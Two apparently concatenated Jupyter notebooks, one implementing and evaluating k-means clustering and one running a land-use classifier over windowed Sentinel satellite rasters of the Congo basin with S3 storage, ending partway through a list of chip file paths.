# Implementing kmeans from scratch ``` import numpy as np import pandas as pd from tqdm.notebook import tqdm import matplotlib.pyplot as plt from sklearn.datasets import make_blobs from IPython.display import clear_output import time k, n = 3, 2 X, y = make_blobs(n_samples=10, centers=k, n_features=n, random_state=0, cluster_std=4) y fig, ax = plt.subplots(figsize=(6, 6), ncols=1) ax.scatter(X[:,0], X[:,1], s=100, alpha=.5, c=y) plt.tight_layout() plt.show() k = 3 centroids = np.random.rand(k, n) centroids from sklearn.metrics.pairwise import euclidean_distances def update(M): c = M.mean(axis=0) rss = np.power(euclidean_distances(c.reshape(1, -1), M)[0], 2).sum() return c, rss RSS = [] for iteration in range(20): clear_output(wait=True) D = euclidean_distances(centroids, X) y_pred = D.T.argmin(axis=1) markers = ['+', '^', 'o'] fig, ax = plt.subplots(figsize=(16, 8), ncols=2) ax[0].scatter(X[:,0], X[:,1], s=100, alpha=1.0) ax[1].scatter(X[:,0], X[:,1], c=y_pred, s=100, alpha=1.0) for i, c in enumerate(centroids): ax[0].scatter(c[0], c[1], s=100, marker=markers[i]) plt.tight_layout() plt.show() assignment = {} for i, c in enumerate(centroids): assignment[i] = [] for j, f in enumerate(y_pred): if f == i: assignment[i].append(X[j]) A = {} for p, v in assignment.items(): A[p] = np.array(v) irss = 0 for z, w in A.items(): if w.shape[0] == 0: pass else: nc, rss = update(w) irss += rss centroids[z] = nc RSS.append(irss) time.sleep(1) fig, ax = plt.subplots(figsize=(6, 6), ncols=1) ax.plot(RSS) plt.tight_layout() plt.show() y_pred y tp, fp, fn, tn = 0, 0, 0, 0 for i, c in enumerate(y_pred): y_true_i = y[i] for j, z in enumerate(y_pred[i+1:]): s = j + i + 1 y_true_j = y[s] if c == z: if y_true_i == y_true_j: tp += 1 else: fp += 1 else: if y_true_i == y_true_j: fn += 1 else: tn += 1 print(tp, fp, fn, tn) tp / (tp + fp) (tp + tn) / (tp + fp + fn + tn) ``` ## Implementazione sklearn ``` from sklearn.cluster import KMeans, AgglomerativeClustering from sklearn.metrics import adjusted_rand_score kmeans = KMeans(n_clusters=3) aggc = AgglomerativeClustering(n_clusters=3) y_pred_k = kmeans.fit_predict(X) y_pred_a = aggc.fit_predict(X) print(y_pred_k) print(y_pred_a) benchmark = {'Kmeans': KMeans(n_clusters=3), 'Agglomerative': AgglomerativeClustering(n_clusters=3)} results = [] for name, alg in benchmark.items(): res = results.append(alg.fit_predict(X)) print(name, adjusted_rand_score(y, y_pred)) ``` ## Real example ``` data_file = 'data/fifa/players_20.csv' P = pd.read_csv(data_file, index_col=0, usecols=range(77)) X = P[['height_cm', 'value_eur']] fig, ax = plt.subplots(figsize=(6, 6), ncols=1) ax.scatter(X.height_cm, X.value_eur) plt.tight_layout() plt.show() kmeans = KMeans(n_clusters=5) y = kmeans.fit_predict(X) def select_points(X, y, cluster): pos = [i for i, x in enumerate(y) if x == cluster] return X.iloc[pos] clusters = [select_points(X, y, c) for c in range(5)] eur_values = np.array([x.value_eur.values for x in clusters], dtype='object') h_values = np.array([x.height_cm.values for x in clusters], dtype='object') fig, ax = plt.subplots(figsize=(16, 6), ncols=3, nrows=1) ax[0].scatter(X.height_cm, X.value_eur, c=y) ax[1].boxplot(h_values) ax[1].set_xlabel('clusters') ax[1].set_title('height') ax[2].boxplot(eur_values) ax[2].set_xlabel('clusters') ax[2].set_title('eur_values') plt.tight_layout() plt.show() ``` ## Scaling data ``` from sklearn.preprocessing import StandardScaler Xs = pd.DataFrame(StandardScaler().fit_transform(X), index=X.index, columns=X.columns) kmeans = KMeans(n_clusters=5) y = kmeans.fit_predict(Xs) clusters = [select_points(Xs, y, c) for c in range(5)] eur_values = np.array([x.value_eur.values for x in clusters], dtype='object') h_values = np.array([x.height_cm.values for x in clusters], dtype='object') fig, ax = plt.subplots(figsize=(16, 6), ncols=3, nrows=1) ax[0].scatter(Xs.height_cm, X.value_eur, c=y) ax[1].boxplot(h_values) ax[1].set_xlabel('clusters') ax[1].set_title('height') ax[2].boxplot(eur_values) ax[2].set_xlabel('clusters') ax[2].set_title('eur_values') plt.tight_layout() plt.show() ```
github_jupyter
# Inference Data Mount ``` !mount -t nfs4 -o nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2,noresvport 172.31.91.151:/ ./efs_inference_data ``` # For Docker Run / Sagemaker ``` import sys sys.executable ``` # Start Local / Sagemaker Imports ``` import os import rasterio as rio import numpy as np from rasterio.windows import Window from glob import glob from shapely.geometry import Polygon from shapely.geometry import box import geopandas as gpd from rasterio.windows import get_data_window import rasterio as rio from inference_predict import * import boto3 import matplotlib.pyplot as plt # import gdal from rasterio.enums import Resampling from rasterio.vrt import WarpedVRT ``` # Windowing ``` def get_windows(img_dim, patch_size=(240, 240), stride=(240, 240)): patch_size = np.array(patch_size) stride = np.array(stride) img_dim = np.array(img_dim) # to take into account edges, add additional blocks around right side edge and bottom edge of raster new_img_dim = [img_dim[0] + stride[0],img_dim[1] + stride[0]] max_dim = (new_img_dim//patch_size)*patch_size - patch_size ys = np.arange(0, img_dim[0], stride[0]) xs = np.arange(0, img_dim[1], stride[1]) tlc = np.array(np.meshgrid(ys, xs)).T.reshape(-1, 2) tlc = tlc[tlc[:, 0] <= max_dim[0]] tlc = tlc[tlc[:, 1] <= max_dim[1]] windows = [] for y,x in tlc.astype(int): windows.append(Window(x, y, patch_size[1], patch_size[0])) return windows def add_ndvi(data, dtype_1=rio.float32): nir = data[3].astype(dtype_1) red = data[2].astype(dtype_1) # Allow division by zero np.seterr(divide='ignore', invalid='ignore') # Calculate NDVI ndvi = ((nir - red) / (nir + red)).astype(dtype_1) # Rescaling for use in 16bit output ndvi = (ndvi + 1) * (2**15 - 1) # Add NDVI band to end of array rast = np.concatenate((data,[ndvi]),axis=0) rast = rast.astype(rio.uint16) return rast ``` # Download Model Files ``` model_url = "s3://canopy-production-ml/inference/model_files/model-best.h5" weights_url = "s3://canopy-production-ml/inference/model_files/model_weights_best.h5" download_model(model_url,weights_url) model = load_model("model.h5","model_weights.h5") label_list = ["Industrial_agriculture","ISL","Mining","Roads","Shifting_cultivation"] def output_windows(granule_dir,patch_size=100, stride=100,SAVE=False,SAVE_INDIVIDUAL=False, bands=[2, 3, 4, 8, 11, 12], model=model, predict_thresh=.5, label_list=label_list, job_name="test_inference_unwarped", output_filename="./inference_output/result.json"): granule_list = glob(f'{granule_dir}/*.tif') output_dict = {} granule_id_list = [] window_id_list = [] window_geom_list = [] data_list = [] label_master_list = [] gdf_list = [] timestamp = gen_timestamp() for j,granule_path in enumerate(granule_list[0:1]): granule_id = granule_path.split("/")[-1].split("_")[0] with rio.open(granule_path) as src: with WarpedVRT(src, crs='EPSG:3257', resampling=Resampling.nearest) as vrt: windows = get_windows(vrt.shape, (patch_size, patch_size), (stride, stride)) for i, window in enumerate(windows): print(f"predicting window {i + 1} of {len(windows)} of granulate {j + 1} of {len(granule_list)}",end='\r', flush=True) label_name_list = [] window_id = i+1 data = vrt.read(bands,window=window, masked=True) data = add_ndvi(data) shape = data.shape new_shape = (data.shape[0],patch_size,patch_size) if shape != new_shape: filled_array = np.full(new_shape, 0) filled_array[:shape[0],:shape[1],:shape[2]] = data data = filled_array window = Window(window.col_off,window.row_off,shape[2],shape[1]) #image pre-processing / inference prediction = model.predict(read_image_tf_out(data)) prediction = np.where(prediction > predict_thresh, 1, 0) prediction_i = np.where(prediction == 1)[1] for i in prediction_i: label_name_list.append(label_list[i]) label_master_list.append(label_name_list) #vectorizing raster bounds for visualization window_bounds = rio.windows.bounds(window, vrt.transform, height=patch_size, width=patch_size) geom = box(*window_bounds) geom_coords = list(geom.exterior.coords) # window_geom_list.append(geom) #create or append to dict.... if granule_id in output_dict: output_dict[granule_id].append({"window_id":window_id,"polygon_coords":geom_coords,"labels":label_name_list}) else: output_dict[granule_id] = [{"window_id":window_id,"polygon_coords":geom_coords,"labels":label_name_list}] save_to_s3(output_dict,output_filename,job_name,timestamp) # gdf = gpd.GeoDataFrame({"granule_id":granule_id_list,"window_id":window_id_list,"geometry":window_geom_list,"labels":label_master_list}) # gdf["labels"] = gdf["labels"].astype(str) # gdf_list.append(gdf) return output_dict # granule_dir = "./efs_inference_data/" granule_dir = "/Volumes/Lacie/zhenyadata/Project_Canopy_Data/PC_Data/Inference/granule_test(unwarped)" output_dict = output_windows(granule_dir,output_filename="./inference_output/result-warped.json") output_dict data = output_dict count = {} label_match_results = [] granule_count = len(data.keys()) granule_list = data.keys() count["granule_count"] = granule_count for k1 in list(data.keys()): for i in range(len(data[k1])): if len(data[k1][i]['labels']) == 0: if "null_chips" not in count.keys(): count["null_chips"] = 1 else: count["null_chips"] += 1 for label in data[k1][i]['labels']: if label not in count.keys(): count[label] = 1 else: count[label] += 1 count for i in range (len(output_dict['101'])): print(output_dict['101'][i]['labels']) new_gdf.shape gdf.plot() new_gdf.to_file("./inference_output/test.geojson", driver='GeoJSON') gdf.to_file("./inference_output/test.geojson", driver='GeoJSON') ``` # Read Output Files ``` def process_output_files(json_path=None,download=False, filepath = "predict_test-2021-05-10-22-38-41.json", label_match="ISL"): s3 = boto3.resource('s3') #Download Model, Weights if download: bucket = json_path.split("/")[2] model_key = "/".join(json_path.split("/")[3:]) filename = json_path.split("/")[-1] s3.Bucket(bucket).download_file(model_key, filename ) filepath = filename with open(filepath) as jsonfile: data = json.load(jsonfile) count = {} label_match_results = [] granule_count = len(data.keys()) granule_list = data.keys() count["granule_count"] = granule_count for k1 in list(data.keys()): for i in range(len(data[k1])): if len(data[k1][i]['predicted_labels']) == 0: if "null_chips" not in count.keys(): count["null_chips"] = 1 else: count["null_chips"] += 1 for label in data[k1][i]['predicted_labels']: if label == label_match: label_match_results.append([k1,data[k1][i]]) if label not in count.keys(): count[label] = 1 else: count[label] += 1 return count, label_match_results, granule_list, data json_path = "s3://canopy-production-ml/inference/output/predict_3257-2021-05-15-22-18-23.json" count, match_results, granule_list, data2 = process_output_files(download=False, json_path=json_path, filepath="/Users/purgatorid/Downloads/inference_output_test-2021-06-25-22-06-37.json") data2["52"][0] match_results count sum(count.values()) - 97 polygon_list = [] for result in match_results: coords = result[1]["polygon_coords"] polygon = Polygon(coords) polygon_list.append(polygon) gdf = gpd.GeoDataFrame({"geometry":polygon_list}) gdf = gdf.set_crs(epsg=3257) gdf = gdf.to_crs(epsg=4326) gdf gdf.to_file("./inference_output/test_warped.geojson", driver='GeoJSON') data['test.tif'][0]["polygon_coords"] ``` # Get List of Non-Processed Granules ``` def s3_dir_ls(s3_dir_url): objs = [] bucket = s3_dir_url.split("/")[2] key = "/".join(s3_dir_url.split("/")[3:5]) s3 = boto3.resource('s3') my_bucket = s3.Bucket(bucket) for obj in my_bucket.objects.filter(Prefix=key): objs.append("s3://" + bucket + "/" + obj.key) return objs[1:] s3_dir_url = "s3://canopy-production-ml/full_congo_basin/02.17.21_CB_GEE_Pull/" all_granules = s3_dir_ls(s3_dir_url) granule_ids_completed = list(data.keys()) def get_granule_paths(granule_ids_completed,all_granules): incomplete_granules = [] for path in all_granules: granule_id = path.split("/")[-1].split("_")[0] if granule_id not in granule_ids_completed: incomplete_granules.append(path) return incomplete_granules incomplete_gran_paths = get_granule_paths(granule_ids_completed,all_granules) with open('incomplete_granules_3257.txt', 'w') as filehandle: for listitem in incomplete_gran_paths: filehandle.write('%s\n' % listitem) ``` # Output Vectorized Predicted Granules ``` def s3_dir_match(s3_dir_url,granule_list): objs = [] bucket = s3_dir_url.split("/")[2] key = "/".join(s3_dir_url.split("/")[3:5]) s3 = boto3.resource('s3') my_bucket = s3.Bucket(bucket) window_geom_list = [] granule_id_list = [] for obj in my_bucket.objects.filter(Prefix=key): granule_id = obj.key.split("/")[-1].split("_")[0] if granule_id in granule_list: obj_url = "s3://" + bucket + "/" + obj.key with rio.open(obj_url) as src: bounds = src.bounds geom = box(*bounds) window_geom_list.append(geom) granule_id_list.append(granule_id) gdf = gpd.GeoDataFrame({"geometry":window_geom_list,"granule_id":granule_id_list}) return gdf gdf = s3_dir_match("s3://canopy-production-ml/full_congo_basin/02.17.21_CB_GEE_Pull/",granule_list) gdf gdf.to_file("granules.json", driver="GeoJSON", index=True) ``` # Create and Export GDF of Original Labels Data ``` FILE_NAME = "/Users/purgatorid/Downloads/polygons_021521.csv" df = pd.read_csv( FILE_NAME) gdf = gpd.GeoDataFrame( df, crs={'init': 'epsg:4326'}) polygons = [] for polygon in df["polygon"]: polygons.append(Polygon(json.loads(polygon)["coordinates"][0])) gdf["geometry"] = polygons gdf.loc[90] gdf.to_file("output.json", driver="GeoJSON", index=True) ``` # Load and Reproject One Granulate Containing ISL ``` def convert_raster(input_file, dest_dir, epsg_format='EPSG:3257', windows=False): """Converts the rasters in the src_dir into a different EPSG format, keeping the same folder structure and saving them in the dest_dir.""" print(input_file) filename = "test.tif" # print(filename) # If the respective grouping folders are not available output_filepath = dest_dir + filename print(output_filepath) # Finally, we convert converted = gdal.Warp(output_filepath, [input_file],format='GTiff', dstSRS=epsg_format, resampleAlg='near') converted = None print('Finished') granule = "/Users/purgatorid/Downloads/1241_full_congo_export_v12_all_bands_Feb_11_12_44_53_2021.tif" dest_dir = "/Users/purgatorid/Downloads/" convert_raster(granule,dest_dir) ``` # Visualize Results (Incomplete Code) ``` def visualize_results(match_results,s3_url): for window in match_results: granule_id = window[0] t = {1,2,4} ``` # Running Without Windows Code - Direct Chip Predict ``` model = load_model("model.h5","model_weights.h5") label_list = ["Industrial_agriculture","ISL","Mining","Roads","Shifting_cultivation"] def output_predictions(granule_dir=None,patch_size=100, stride=100,SAVE=False,SAVE_INDIVIDUAL=False, bands=[2, 3, 4, 8, 11, 12], model=model, predict_thresh=.5, label_list=label_list, job_name="test_inference", output_filename="./inference_output/result.json", apply_windows=False, read_process="read_img_tf_out", sample_frac=1, granule_list=None): if granule_list is None: granule_list = glob(f'{granule_dir}/*.tif') end = len(granule_list) // sample_frac granule_list = granule_list[0:end] # print(f"running inference on {len(granule_list)} chips") output_dict = {} granule_id_list = [] window_id_list = [] window_geom_list = [] data_list = [] label_master_list = [] gdf_list = [] timestamp = gen_timestamp() missed_chips = [] for j,granule_path in enumerate(granule_list): label_name_list = [] granule_id = granule_path.split("/")[-1].split("_")[0] filepath = granule_path.split("/")[-1] ground_label = granule_path.split("/")[2] print(f'Running inference on chip {j+1} of {len(granule_list)}',end='\r', flush=True) if filepath: with rio.open(granule_path) as src: data = src.read(bands,masked=True) data = add_ndvi(data) shape = data.shape if apply_windows: new_shape = (data.shape[0],patch_size,patch_size) if shape != new_shape: filled_array = np.full(new_shape, 0) filled_array[:shape[0],:shape[1],:shape[2]] = data data = filled_array window = Window(window.col_off,window.row_off,shape[2],shape[1]) #image pre-processing / inference if read_process == "read_img_tf_out": read_func = read_image_tf_out else: read_func = read_image prediction = model.predict(read_func(data)) # print("original_prediction:",prediction) prediction = np.where(prediction > predict_thresh, 1, 0) # print("sigmoid prediction gate:",prediction) prediction_i = np.where(prediction == 1)[1] if 1 not in np.where(prediction == 1)[1]: missed_chips.append(granule_path) # print("index of matching labels:",prediction_i) for i in prediction_i: label_name_list.append(label_list[i]) # label_master_list.append(label_name_list) #vectorizing raster bounds for visualization data_bounds = src.bounds geom = box(*data_bounds) geom_coords = list(geom.exterior.coords) # window_geom_list.append(geom) #create or append to dict.... if granule_id in output_dict: output_dict[granule_id].append({"polygon_coords":geom_coords,"predicted_labels":label_name_list,"actual_label":ground_label}) else: output_dict[granule_id] = [{"polygon_coords":geom_coords,"predicted_labels":label_name_list,"actual_label":ground_label}] save_to_s3(output_dict,output_filename,job_name,timestamp) # if j % 1000 == 0: # save_to_s3(output_dict,output_filename,job_name,timestamp) # gdf = gpd.GeoDataFrame({"granule_id":granule_id_list,"window_id":window_id_list,"geometry":window_geom_list,"labels":label_master_list}) # gdf["labels"] = gdf["labels"].astype(str) # gdf_list.append(gdf) return output_dict,missed_chips # granule_dir = "./efs_inference_data/" granule_dir_local = "/Volumes/Lacie/zhenyadata/Project_Canopy_Data/PC_Data/Sentinel_Data/Chips/misha_polygons_cloudfreemerge/yes/ISL/100/91/" # granule_dir_efs = output_dict,missed_chips = output_predictions(granule_dir_local) df = pd.DataFrame({"file_path":missed_chips}) df.to_csv("missed_chips.csv",index=False) data = output_dict count = {} label_match_results = [] granule_count = len(data.keys()) granule_list = data.keys() count["granule_count"] = granule_count for k1 in list(data.keys()): for i in range(len(data[k1])): if len(data[k1][i]['labels']) == 0: if "null_chips" not in count.keys(): count["null_chips"] = 1 else: count["null_chips"] += 1 for label in data[k1][i]['labels']: if label not in count.keys(): count[label] = 1 else: count[label] += 1 count ``` #### Opening Chips from S3 ``` bucket = 'canopy-production-ml' def s3_actions(bucket, in_path=None, out_path=None, copy_list=None, copy_dir=False, delete=False, stop_at=None, chip_list=False, chip_count=False): s3 = boto3.resource('s3') my_bucket = s3.Bucket(bucket) objs = [] total_files = 0 if copy_dir or delete or chip_list or chip_count: for obj in my_bucket.objects.filter(Prefix=in_path): total_files += 1 objs.append(obj.key) if total_files == stop_at: break tot_objs = len(objs) if delete: for index,obj in enumerate(objs,1): print(f"deleting {index} of {tot_objs}", end='\r', flush=True) obj.delete() if chip_list: return objs if chip_count: return total_files if copy_list: total_copy_list = len(copy_list) for index,obj in enumerate(copy_list,1): print(f"copying {index} of {total_copy_list}", end='\r', flush=True) old_key = in_path + obj new_key = out_path + obj CopySource = { 'Bucket': bucket, 'Key':old_key} my_bucket.copy(CopySource, new_key) path = 'chips/cloudfree-merge-polygons/dataset_v2/' full_chip_list = s3_actions(bucket,in_path=path,chip_list=True) prepend = "s3://canopy-production-ml/" full_chip_list = [prepend + i for i in full_chip_list] for x in full_chip_list: if ".csv" in x: full_chip_list.remove(x) continue for x in full_chip_list: if ".csv" in x: print(x) # s3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/ # rio.open(f"s3://canopy-production-ml/{full_chip_list[1]}") ``` #### Running Infernece on All Labeled Data ``` # chips_dir_list = glob("./efs/*/100/*/*.tif") output_dict,missed_chips = output_predictions(granule_list=full_chip_list) ``` # Histogram for Numpy Array ``` data1.shape def np_hist(arr,tensor=True): if tensor: arr = np.array(arr) arr = np.transpose(arr[0], (2, 1, 0)) for i in range(arr.shape[0]): band_np = arr[i].flatten() plt.hist(band_np,label=str(i)) plt.legend(prop={'size': 10}) plt.show() np_hist(data) np_hist(data1,tensor=False) ``` # Retrieving Chips Missed on Inference Run ``` tot_len = 0 for key in data.keys(): tot_len += len(data[key]) tot_len len(full_chip_list) full_chip_list[1] data["79"] def missing_chips(full_chip_list,data): completed_chips = [] for key in list(data.keys()): for completed_chip in data[key]: completed_chip_id = (key,completed_chip["actual_label"]) if completed_chip_id not in completed_chips: completed_chips.append(completed_chip_id) total_chips = [] for chip in full_chip_list[1:]: try: gran_id = chip.split("/")[5] actual_label = chip.split("/")[3] total_chip_id = (gran_id,actual_label) if total_chip_id not in total_chips: total_chips.append(total_chip_id) except: continue missing_chips = list(set(total_chips) - set(completed_chips)) chips_to_process = [] for missing_chip_id in missing_chips: for chip in full_chip_list[1:]: try: gran_id = chip.split("/")[5] actual_label = chip.split("/")[3] total_chip_id = (gran_id,actual_label) if missing_chip_id == total_chip_id: if total_chip_id not in chips_to_process: chips_to_process.append(chip) except: continue return chips_to_process,missing_chips chips_to_process,missing_chips = missing_chips(full_chip_list,data) missing_chips prepend = "s3://canopy-production-ml/" missing_chips_list = [prepend + i for i in chips_to_process] output_dict,missed_chips = output_predictions(granule_list=missing_chips_list) missing_chips_list ``` # Export True and False Positive on all 'ISL' labelled data ``` len(['s3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_2900.tif', 